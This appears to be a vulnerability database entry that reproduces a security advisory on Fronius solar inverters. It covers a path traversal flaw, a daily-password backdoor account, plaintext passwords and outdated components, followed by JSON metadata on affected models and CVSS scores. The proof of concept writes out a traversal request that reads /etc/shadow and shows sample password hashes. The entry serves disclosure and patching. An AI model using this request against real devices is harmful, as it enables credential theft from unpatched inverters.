VAR-201912-1533
Vulnerability from variot - Updated: 2024-11-23 22:41admincgi-bin/service.fcgi on Fronius Solar Inverter devices before 3.14.1 (HM 1.12.1) allows action=download&filename= Directory Traversal. The vulnerability stems from a network system or product's failure to properly filter special elements in a resource or file path. An attacker could use this vulnerability to access locations outside the restricted directory. SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
title: Multiple vulnerabilites
product: Fronius Solar Inverter Series
vulnerable version: SW Version <3.14.1 (HM 1.12.1) fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution section below CVE number: CVE-2019-19228, CVE-2019-19229 impact: High homepage: https://www.fronius.com found: 2018-10-31 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
"A passion for new technologies, intensive research and revolutionary solutions have been shaping the Fronius brand since 1945. As the technology leader, we find, develop and implement innovative methods to monitor and control energy for welding technology, photovoltaics and battery charging. We forge new paths, try something difficult and succeed where others have failed in achieving what seems to be impossible. [...]"
Source: http://www.fronius.com/en/about-fronius/company-values
Business recommendation:
The vendor automatically performed a fleet update of the solar inverters in the field in order to patch them. Nevertheless, as not all devices could be reached through such an update, all remaining users are advised to install the patches provided by the vendor immediately.
Vulnerability overview/description:
1) Unencrypted Communication The whole communication is handled over HTTP. There is no possibility to activate an HTTPS web service.
2) Authenticated Path Traversal (CVE-2019-19229) A path traversal attack for authenticated users is possible. This allows getting access to the operating system of the device and access information like network configurations and connections to other hosts or potentially other sensitive information.
This vulnerability has been fixed in March 2019 in version 3.12.5. (HM 1.10.5).
The web server runs with "nobody" privileges, but nearly all files on the file system are world-readable and can be extracted.
3) Backdoor Account (CVE-2019-19228) The web interface has a backdoor user account with the username "today". This user account has all permissions of all other users ("service", "admin" and "user") together. As its name suggests, the password for the user "today" changes every day and seems to be different to other devices with the same firmware. This means that some device-specific strings (e.g. the public device-ID) is mixed up every day to generate a new password. This account is being used by Fronius support in order to access the device upon request from the user.
The fix for this issue has been split in two parts. The "password reset" part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the support account needs an architectural rework which will be fixed in a future version (planned for 3.15.1 (HM 1.15.1)).
The passwords for all users of the web interface are stored in plain-text. This can be seen as another vulnerability and it has been fixed in version 3.14.1 (HM 1.12.1).
4) Outdated and Vulnerable Software Components Outdated and vulnerable software components were found on the device during a quick examination. Not all of the outdated components can be fixed by the vendor in the current solar inverter generation, see the workaround section below.
Proof of concept:
1) Unencrypted Communication By using an interceptor proxy this vulnerability can be verified in a simple way.
2) Authenticated Path Traversal (CVE-2019-19229) By sending the following request to the following endpoint, a path traversal vulnerability can be triggered: http:///admincgi-bin/service.fcgi
Request to read the "/etc/shadow" password file: ┌────────────────────────────────────────────────────────────────────────────── |GET /admincgi-bin/service.fcgi?action=download&filename=../../../../../etc/shadow └──────────────────────────────────────────────────────────────────────────────
As response, the file is returned without line breaks. In this example the line breaks are added for better readability:
┌────────────────────────────────────────────────────────────────────────────── |HTTP/1.1 200 OK |Content-Type: application/force-download |Content-Disposition: attachment; filename=../../../../../etc/shadow |Connection: close |Date: Sun, 28 Oct 2018 08:20:27 GMT |Server: webserver | |root:$1$6MNb1Vq3$oU4TaPqQ782Y2ybdWLICh1:0:1:99999:7::: |nobody:*:10897:0:99999:7::: |messagebus:$1$6JrvtnWp$T.JvjxjbGTCD.jF7.hhb3.:15638:0:99999:7::: └──────────────────────────────────────────────────────────────────────────────
By retrieving the file "/etc/issue" an easter-egg was found:
┌──────────────────────────────────────────────────────────────────────────────
| __ ___ _ _ _ _ __ ___ _ __ __ _
|\ \ / (|||) | __ __ _ __ _ __ _ / / | \| | \ \ / /___| |__
| \ \/\/ /| | | | | | ' \/ / _ / ` | / / | |) | |__ \ \/\/ // -) ' \
| \/ \/ ||||||||\__,\,\__,| // |/|_| \/ \_/\|.__/
|Congratulations to all non Fronius employees which have come so far :)
└──────────────────────────────────────────────────────────────────────────────
3) Backdoor Account (CVE-2019-19228) The passwords of the web interface of the affected versions are stored in the file "/tmp/web_users.conf" in clear text: ┌────────────────────────────────────────────────────────────────────────────── |admin: |service: |today:<40-bit hash-value> └──────────────────────────────────────────────────────────────────────────────
The password for "today", which is generated by some algorithm, is suspected to be a sha1-hash which includes the system-time. A detailed firmware analysis can reveal the algorithm but has not been performed for this advisory.
4) Outdated and Vulnerable Software Components By using the path traversal vulnerability (2) a lot of components are found to be outdated:
- Busybox 1.22.1 (December 23, 2014) multiple CVEs
- Lighttpd 1.4.33 (September 27, 2013) multiple CVEs
- Linux kernel 4.1.39 (March 13, 2017) multiple CVEs
The used SDK is based on the OSELAS toolchain from 2011 and U-Boot from 2012: * gcc version 4.6.2 (OSELAS.Toolchain-2011.11.1) * U-Boot 2012.07-3
Vulnerable / tested versions:
The Fronius Symo 10.0-3-M (1) SWVersion 3.10.3-1 (HM 1.9.2) was tested but more solar inverters from Fronius share this firmware. The following list has been provided by the vendor:
Symo Hybrid 3.0-3-M Symo Hybrid 4.0-3-M Symo Hybrid 5.0-3-M Datamanager Box 2.0 Symo 3.0-3-M ) Symo 3.0-3-S ) Symo 3.7-3-M ) Symo 3.7-3-S ) Symo 4.5-3-M ) Symo 4.5-3-S ) Symo 5.0-3-M ) Symo 6.0-3-M ) Symo 7.0-3-M ) Symo 8.2-3-M ) Symo 10.0-3-M ) (tested) Symo 10.0-3-M-OS ) Symo 12.5-3-M ) Symo 15.0-3-M ) Symo 17.5-3-M ) Symo 20.0-3-M ) Galvo 1.5-1 ) Galvo 2.0-1 ) Galvo 2.5-1 ) Galvo 3.0-1 ) Galvo 3.1-1 ) Galvo 1.5-1 208-240 ) Galvo 2.0-1 208-240 ) Galvo 2.5-1 208-240 ) Galvo 3.1-1 208-240 ) Primo 3.0-1 ) Primo 3.5-1 ) Primo 3.6-1 ) Primo 4.0-1 ) Primo 4.6-1 ) Primo 5.0-1 ) Primo 5.0-1 AUS ) Primo 5.0-1 SC ) Primo 6.0-1 ) Primo 8.2-1 ) Primo 3.8-1 208-240 ) Primo 5.0-1 208-240 ) Primo 6.0-1 208-240 ) Primo 7.6-1 208-240 ) Primo 8.2-1 208-240 ) Primo 10.0-1 208-240 ) Primo 11.4-1 208-240 ) Primo 12.5-1 208-240 ) Primo 15.0-1 208-240 ) Symo 10.0-3 208-240 ) Symo 10.0-3 480 ) Symo 12.0-3 208-240 ) Symo 12.5-3 480 ) Symo 15.0-3 107 ) Symo 15.0-3 480 ) Symo 17.5-3 480 ) Symo 20.0-3 480 ) Symo 22.7-3 480 ) Symo 24.0-3 480 ) Eco 25.0-3-S ) Eco 27.0-3-S ) Symo Advanced 10.0-3 208-240 ) Symo Advanced 12.0-3 208-240 ) Symo Advanced 15.0-3 480 ) Symo Advanced 20.0-3 480 ) Symo Advanced 22.7-3 480 ) Symo Advanced 24.0-3 480 ) *) only with Datamanager card/box
Vendor contact timeline:
2018-11-05: Contacting vendor through contact@fronius.com, requesting security contact 2018-11-06: Vendor replies and confirms security issues 2018-12-03: Meeting with vendor to discuss security issues 2019-01 - 2019-11: Multiple telcos discussing Fronius' rollout plan and fixes 2019-03-18: Release of version 3.12.5 (HM 1.10.5) which fixes the path traversal vulnerability 2019-07-30: Release of version 3.14.1 (HM 1.12.1) which fixes many of the other reported issues 2019-08 - 2019-11: Testing & Fleet update to version 3.14.1 (HM 1.12.1) 2019-12-03: Coordinated release of security advisory
Solution:
The vendor provides a patched firmware via their download portal. Visit the download page and search for "firmware update" and choose the "Fronius Solar.update Datamanager V3.14.1-10" firmware.
The new version v3.14.1 (HM 1.12.1) which contains most of the security fixes can be downloaded directly as well: https://www.fronius.com/~/downloads/Solar%20Energy/Firmware/SE_FW_Fronius_Solar.update_Datamanager_EN.zip
Some of the identified vulnerabilities (e.g. issue 1 and parts of 4) cannot be fixed in the current solar inverter product/software generation.
Workaround:
Restrict network access to the device as much as possible and disable port forwarding from the Internet. Fronius Solar.Web access is still possible.
Advisory URL:
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2019
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201912-1533",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "datamanager box 2.0",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "eco 25.0-3-s",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "eco 27.0-3-s",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 1.5-1 208-240",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 1.5-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.0-1 208-240",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.0-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.5-1 208-240",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 2.5-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 3.0-1",
"scope": "lt",
"trust": 1.8,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 3.1-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 11.4-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.6-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo hybrid 4.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 17.5-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 8.2-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 20.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo hybrid 3.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 12.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.8-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 17.5-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 4.5-3-s",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 4.6-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 24.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 3.5-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "galvo 3.1-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.0-3-s",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 10.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 12.5-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 20.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 12.5-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 22.7-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.7-3-s",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 6.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 15.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo hybrid 5.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 15.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3-m-os",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 10.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 8.2-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 15.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 22.7-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 6.0-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 3.7-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo advanced 24.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 20.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 12.5-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 7.6-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 15.0-3 480",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 15.0-3 107",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 5.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 7.0-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 4.5-3-m",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1 sc",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 4.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 5.0-1 aus",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 12.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 6.0-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "primo 8.2-1 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "symo 10.0-3 208-240",
"scope": "lt",
"trust": 1.0,
"vendor": "fronius",
"version": "3.14.1"
},
{
"model": "solar inverter (hm",
"scope": "lt",
"trust": 0.6,
"vendor": "fronius",
"version": "3.14.11.12.1)"
},
{
"model": "symo advanced 15.0-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo 8.2-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 20.0-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo hybrid 4.0-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo hybrid 3.0-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 10.0-3 208-240",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo hybrid 5.0-3-m",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 22.7-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 12.0-3 208-240",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
},
{
"model": "symo advanced 24.0-3 480",
"scope": "eq",
"trust": 0.6,
"vendor": "fronius",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:fronius:datamanager_box_2.0_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:eco_25.0-3-s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:eco_27.0-3-s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_1.5-1_208-240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_1.5-1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.0-1_208-240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.0-1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.5-1_208-240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_2.5-1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fronius:galvo_3.0-1_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Weber",
"sources": [
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
],
"trust": 0.7
},
"cve": "CVE-2019-19229",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2019-19229",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-45163",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-19229",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-19229",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-19229",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-19229",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-45163",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201912-185",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "admincgi-bin/service.fcgi on Fronius Solar Inverter devices before 3.14.1 (HM 1.12.1) allows action=download\u0026filename= Directory Traversal. The vulnerability stems from a network system or product\u0027s failure to properly filter special elements in a resource or file path. An attacker could use this vulnerability to access locations outside the restricted directory. SEC Consult Vulnerability Lab Security Advisory \u003c 20191203-0 \u003e\n=======================================================================\n title: Multiple vulnerabilites\n product: Fronius Solar Inverter Series\n vulnerable version: SW Version \u003c3.14.1 (HM 1.12.1)\n fixed version: \u003e=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution\n section below\n CVE number: CVE-2019-19228, CVE-2019-19229\n impact: High\n homepage: https://www.fronius.com\n found: 2018-10-31\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"A passion for new technologies, intensive research and revolutionary solutions\nhave been shaping the Fronius brand since 1945. As the technology leader, we\nfind, develop and implement innovative methods to monitor and control energy\nfor welding technology, photovoltaics and battery charging. We forge new paths,\ntry something difficult and succeed where others have failed in achieving what\nseems to be impossible. [...]\"\n\nSource: http://www.fronius.com/en/about-fronius/company-values\n\n\nBusiness recommendation:\n------------------------\nThe vendor automatically performed a fleet update of the solar inverters in the field\nin order to patch them. Nevertheless, as not all devices could be reached through such\nan update, all remaining users are advised to install the patches provided\nby the vendor immediately. \n\n\nVulnerability overview/description:\n-----------------------------------\n1) Unencrypted Communication\nThe whole communication is handled over HTTP. There is no possibility to\nactivate an HTTPS web service. \n\n\n2) Authenticated Path Traversal (CVE-2019-19229)\nA path traversal attack for authenticated users is possible. This allows getting\naccess to the operating system of the device and access information like\nnetwork configurations and connections to other hosts or potentially other\nsensitive information. \n\nThis vulnerability has been fixed in March 2019 in version 3.12.5. (HM 1.10.5). \n\n The web server runs with \"nobody\" privileges, but nearly all files on the\nfile system are world-readable and can be extracted. \n\n\n3) Backdoor Account (CVE-2019-19228)\nThe web interface has a backdoor user account with the username \"today\". \nThis user account has all permissions of all other users (\"service\",\n\"admin\" and \"user\") together. \nAs its name suggests, the password for the user \"today\" changes every day\nand seems to be different to other devices with the same firmware. This\nmeans that some device-specific strings (e.g. the public device-ID) is\nmixed up every day to generate a new password. \nThis account is being used by Fronius support in order to access the\ndevice upon request from the user. \n\nThe fix for this issue has been split in two parts. The \"password reset\"\npart has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the\nsupport account needs an architectural rework which will be fixed in a\nfuture version (planned for 3.15.1 (HM 1.15.1)). \n\nThe passwords for all users of the web interface are stored in plain-text. \nThis can be seen as another vulnerability and it has been fixed in\nversion 3.14.1 (HM 1.12.1). \n\n\n4) Outdated and Vulnerable Software Components\nOutdated and vulnerable software components were found on the device during\na quick examination. Not all of the outdated components can be fixed by the vendor\nin the current solar inverter generation, see the workaround section below. \n\n\nProof of concept:\n-----------------\n1) Unencrypted Communication\nBy using an interceptor proxy this vulnerability can be verified in a\nsimple way. \n\n\n2) Authenticated Path Traversal (CVE-2019-19229)\nBy sending the following request to the following endpoint, a path traversal\nvulnerability can be triggered:\nhttp://\u003cIP-Address\u003e/admincgi-bin/service.fcgi\n\nRequest to read the \"/etc/shadow\" password file:\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n|GET 